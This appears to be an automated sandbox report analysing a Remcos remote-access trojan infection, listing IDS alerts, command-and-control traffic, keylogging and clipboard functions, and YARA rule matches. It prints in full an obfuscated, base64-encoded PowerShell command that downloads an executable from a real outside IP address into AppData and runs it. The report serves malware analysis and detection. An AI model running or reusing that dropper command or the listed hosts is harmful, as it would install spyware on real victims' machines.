                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49968 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49974 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49980 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49959 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49987 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49993 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50009 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50028 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50015 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50022 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50044 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50049 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50003 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50055 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50063 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50066 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50067 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50065 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50068 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50069 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50060 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50071 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50074 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50061 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50073 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50064 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50075 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50078 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50080 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50076 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50081 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50085 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50084 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49899 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50082 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50070 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50038 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50062 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49734 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49843 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50072 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50079 -> 107.173.4.16:2560
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50083 -> 107.173.4.16:2560
                Source: Malware configuration extractor | IPs: 107.173.4.16
                Source: global traffic | TCP traffic: 192.168.2.4:49731 -> 107.173.4.16:2560
                Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OK | Date: Mon, 16 Dec 2024 16:30:28 GMT | Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 | Last-Modified: Mon, 16 Dec 2024 12:01:19 GMT | ETag: "84000-62961f03fa810" | Accept-Ranges: bytes | Content-Length: 540672 | Keep-Alive: timeout=5, max=100 | Connection: Keep-Alive | Content-Type: application/x-msdownload
                Source: Joe Sandbox View | IP Address: 192.3.179.166
                Source: Joe Sandbox View | IP Address: 107.173.4.16
                Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS
                Source: global traffic | HTTP traffic detected: GET /75/ecome.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 192.3.179.166 | Connection: Keep-Alive
                Source: unknown | TCP traffic detected without corresponding DNS query: 192.3.179.166
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_028C7A18 URLDownloadToFileW
                Source: global traffic | HTTP traffic detected: GET /75/ecome.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 192.3.179.166 Connection: Keep-Alive
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://192.3.179.166/75/ecome.ex
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1821174062.0000000006DEE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.179.166/75/ecome.exe
                Source: powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.179.166/75/ecome.exenG
                Source: powershell.exe, 00000003.00000002.1824736094.0000000007DD2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.179.166/75/ecome.exeo
                Source: powershell.exe, 00000003.00000002.1825069660.0000000007E17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://192.3.179.166/75/ecome.exewC:
                Source: nicetomeetyousweeet.exe | String found in binary or memory: http://geoplugin.net/json.gp
                Source: nicetomeetyousweeet.exe, 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, nicetomeetyousweeet.exe, 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, nicetomeetyousweeet.exe, 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: Amcache.hve.9.dr | String found in binary or memory: http://upx.sf.net
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000003.00000002.1815577580.00000000046D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004827000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000003.00000002.1815577580.0000000004E56000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: powershell.exe, 00000003.00000002.1821174062.0000000006E52000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com64/WindowsPowerShell/v1.0/indowsErrorReporting
                Source: powershell.exe, 00000003.00000002.1818216771.000000000573A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR

                E-Banking Fraud

                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146373644.000000000068E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR

                Spam, unwanted Advertisements and Ransom Demands

                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041BB71 SystemParametersInfoW
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041BB77 SystemParametersInfoW
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079BDD8 SystemParametersInfoW
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079BDDE SystemParametersInfoW

                System Summary

                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWeRsHelL -EX BYPass -nop -W 1 -C deVicecREDeNtIaLDEPLOYmEnt.ExE ; INVOkE-ExPRESsIon($(iNVOKe-eXprEsSIoN('[SYsTem.tEXT.eNCODing]'+[cHAr]58+[chAR]58+'UTF8.GeTSTrInG([sySTEm.coNVErt]'+[cHAR]0X3A+[CHar]58+'fRomBasE64StriNG('+[cHAr]0X22+'JHJIQVp5bkw1UG1uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlUmRFZkluaVRpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtidUtvVmpvYUxlLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWWZJLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMa0ZHT09RclBIUix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdzeE9URlFFZXAsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFoWFEpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImlSRFN1IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5sT0NzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHJIQVp5bkw1UG1uOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc5LjE2Ni83NS9lY29tZS5leGUiLCIkRW52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUiLDAsMCk7U1RBUlQtU2xFRXAoMyk7aU52b0tFLWVYUFJlU1NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNldG9tZWV0eW91c3dlZWV0LmV4ZSI='+[cHAR]0x22+'))')))"
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.3.nicetomeetyousweeet.exe.2210000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 6.2.nicetomeetyousweeet.exe.780e67.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000006.00000002.4146258809.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000006.00000002.4145931903.0000000000400000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000002.4146476987.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000006.00000003.1808435208.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: nicetomeetyousweeet.exe PID: 7088, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ecome[1].exe
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041ACC1 OpenProcess,NtSuspendProcess,CloseHandle
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041ACED OpenProcess,NtResumeProcess,CloseHandle
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079CD05 NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079AF54 OpenProcess,NtResumeProcess,CloseHandle
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079AF28 OpenProcess,NtSuspendProcess,CloseHandle
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00795B1C ExitWindowsEx,LoadLibraryA,GetProcAddress
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041D071
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004520D2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0043D098
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00437150
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004361AA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00426254
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00431377
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0043651C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0041E5DF
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0044C739
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004367C6
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_004267CB
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0043C9DD
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00432A49
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00436A8D
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0043CC0C
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00436D48
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00434D22
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00426E73
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00440E20
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0043CE3B
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00412F45
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00452F00
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_00426FAD
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007A70DA
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007BD0A2
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007C1087
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007A7214
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007BD2FF
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_0079D2D8
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007D2339
                Source: C:\Users\user\AppData\Roaming\nicetomeetyousweeet.exe | Code function: 6_2_007B73B7
